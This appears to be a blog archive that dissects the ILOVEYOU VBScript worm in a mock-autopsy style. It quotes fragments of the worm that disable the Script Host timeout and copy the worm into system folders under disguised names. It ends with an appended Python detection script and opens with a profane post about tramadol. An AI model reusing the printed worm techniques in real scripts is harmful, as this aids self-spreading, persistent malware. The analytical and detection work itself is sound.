Showing posts with label virus autopsy. Show all posts

17.12.07

for the last time:

tramadol fuck you up?
"windows scripting host\settings\timeout"
how much tramadol fucks you up
will tramadol fuck you up
does tramadol fuck you up
solpadol
does Tramadol fuck you up ?
YES, for fuck's sake, tramadol fucks you up. it fucks you up bad. you won't be able to program properly, you sure as shit won't be able to do maths, you won't even feel like trying to do sports or anything active, you'll throw up all the time, you'll look and sound like an authentic pothead and you'll lose any interest you ever had in anything but sleep.

[kudos to the guy who kept looking for the Registry setting that messes with the WSH's timeout, though. it's under HKLM/Software/Microsoft/Windows iirc, and its main malicious use is to get rid of the timeout completely so viruses can run free and never be killed because of inactivity.]

mang, i hope i don't get readers who hate profanity.

L

14.9.07

virus autopsy: ILOVEYOU, pt.2

*click* returning to the autopsy of the ILOVEYOU virus. time is 2340, at the last session we saw the subject's mechanisms for stopping timeouts, allowing itself to remain active indefinitely. it's time to look at some more. forceps!

' Create 3 copies of the script in the Windows, System and Temp folders
set dirwin = fso.GetSpecialFolder(0)
set dirsystem = fso.GetSpecialFolder(1)
set dirtemp = fso.GetSpecialFolder(2)
set c = fso.getFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirWin&"\Win32DLL.vbs")
c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ah, how very devious! how marvellously malicious... or perhaps not. (note the inelegant coding, once again.) what it's doing here is using the fso object it created earlier to copy itself to three locations: the root of the Windows directory, that of the temp directory, and that of the System directory. these are generally the first three locations modern AV ware will scan, because they're obvious choices. let's see what it wants to do next. scalpel!
' Set Internet Explorer's start page to one of 4 URLs, in order to download an executable.
' If the executable has already been downloaded it is started automatically the next time
' Windows boots, and the start page of Internet Explorer is reset to a blank page.
regruns()
' create an HTML file that launches the ActiveX component as well as one of the copies of the script
html()
' Send a copy of the script to all entries in the Outlook address book
spreadtoemail()
' overwrite specific files with the script
' if the files are not scripts yet, script files with the same name as the files are created
' with the extension .vbs
' delete the original files
' a script that automatically sends the email worm to everyone in the IRC channel is attached to mIRC
listadriv()
end sub
hm. here we see it calling four subroutines in turn, regruns(), html(), spreadtoemail(), and listadriv(), and then main() ends. next time we'll be looking at the regruns() process, its first port of call. shove it back in the freezer, nurse. time is 0011. *click*

10.9.07

virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, received as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

rem barok -loveletter(vbe) (i hate go to school)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines

On Error Resume Next
dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy

eq = ""
ctr = 0
set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
vbscopy = file.ReadAll

ach, handkerchief. handkerchief! thank you nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them (fso, file, vbscopy) just to read the script's own source off the filesystem into a string... i'll remove them and go under the ribcage.
main()

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
' checks the time out of Windows scripting host
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
' change the script to endless: a Timeout of 0 means WSH never kills the script for running too long
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
end if
alright, hold it there, nurse. you see that? the thing reads the Windows Scripting Host Timeout value out of HKCU, and if anybody has set it to something, writes a zero over it. zero means no timeout at all, so WSH will never kill the script for running too long, and the worm gets to finish everything it wants to do. devious, but not devious enough... i think we're done for tonight, nurse.

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.
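as an added example, not code from either post and not part of the worm: a small static triage script for the two tricks dissected so far, the Timeout-to-zero RegWrite from part 1 and the three self-copies into the Windows, System and Temp folders from pt.2 (one of them under the double extension .TXT.vbs). it is written in Python rather than VBScript so it runs anywhere; the regexes, the finding labels and the double-extension heuristic are my own assumptions, and SAMPLE is a constructed fragment stitched together from the lines quoted above, with the RegWrite call's missing quote fixed so the regex sees a real path.

```python
"""Static triage for VBScript worms in the ILOVEYOU mould.

Added example: scans VBScript source text for (a) a RegWrite that zeroes the
WSH Timeout value, (b) copies of WScript.ScriptFullName dropped into the
Windows, System and Temp folders, and (c) a dropped file whose name carries a
double extension such as .TXT.vbs. Regexes and labels are assumptions.
"""
import re

# FSO GetSpecialFolder indices: 0 = Windows, 1 = System, 2 = Temp
FOLDER_NAMES = {0: "Windows", 1: "System", 2: "Temp"}

# RegWrite of 0 to the WSH Timeout value; accepts the old "Windows Scripting
# Host" and the current "Windows Script Host" key name, under HKCU or HKLM.
TIMEOUT_RE = re.compile(
    r'RegWrite\s*\(?\s*"[^"]*Windows Script(?:ing)? Host\\Settings\\Timeout"\s*,\s*0\b',
    re.IGNORECASE,
)
# set dirwin = fso.GetSpecialFolder(0)
SPECIAL_RE = re.compile(r'set\s+(\w+)\s*=\s*\w+\.GetSpecialFolder\(\s*(\d)\s*\)', re.IGNORECASE)
# set c = fso.getFile(WScript.ScriptFullName)  -> a handle on the running script itself
SELF_RE = re.compile(r'set\s+(\w+)\s*=\s*\w+\.GetFile\(\s*WScript\.ScriptFullName\s*\)', re.IGNORECASE)
# c.Copy(dirsystem&"\MSKernel32.vbs")
COPY_RE = re.compile(r'(\w+)\.Copy\s*\(\s*(\w+)\s*&\s*"\\?([^"]+)"', re.IGNORECASE)
# LOVE-LETTER-FOR-YOU.TXT.vbs: a harmless-looking extension in front of the real one
DOUBLE_EXT_RE = re.compile(r'\.[a-z0-9]{2,4}\.vb[se]$', re.IGNORECASE)


def triage(source: str) -> list[str]:
    """Return finding labels for the given VBScript source, in source order."""
    findings = []
    if TIMEOUT_RE.search(source):
        findings.append("wsh-timeout-disabled")
    # VBScript identifiers are case-insensitive (dirwin == dirWin), so normalise.
    special = {m.group(1).lower(): int(m.group(2)) for m in SPECIAL_RE.finditer(source)}
    self_handles = {m.group(1).lower() for m in SELF_RE.finditer(source)}
    for m in COPY_RE.finditer(source):
        obj, folder, name = m.group(1).lower(), m.group(2).lower(), m.group(3)
        # only a copy of the script itself into a special folder counts
        if obj in self_handles and folder in special:
            where = FOLDER_NAMES.get(special[folder], str(special[folder]))
            findings.append(f"self-copy:{where}:{name}")
            if DOUBLE_EXT_RE.search(name):
                findings.append(f"double-extension:{name}")
    return findings


# Constructed sample: the lines quoted in the two posts, joined into one fragment.
SAMPLE = r'''
On Error Resume Next
set fso = CreateObject("Scripting.FileSystemObject")
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
end if
set dirwin = fso.GetSpecialFolder(0)
set dirsystem = fso.GetSpecialFolder(1)
set dirtemp = fso.GetSpecialFolder(2)
set c = fso.getFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirWin&"\Win32DLL.vbs")
c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
'''

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

run it over the sample and you get one timeout finding, three self-copy findings (System, Windows, Temp) and one double-extension finding for the Temp copy. treat the labels as signals, not a verdict: a Timeout of 0 is also what some admins set on purpose for long-running logon scripts, and the regexes only catch the plain, un-obfuscated form the worm actually used.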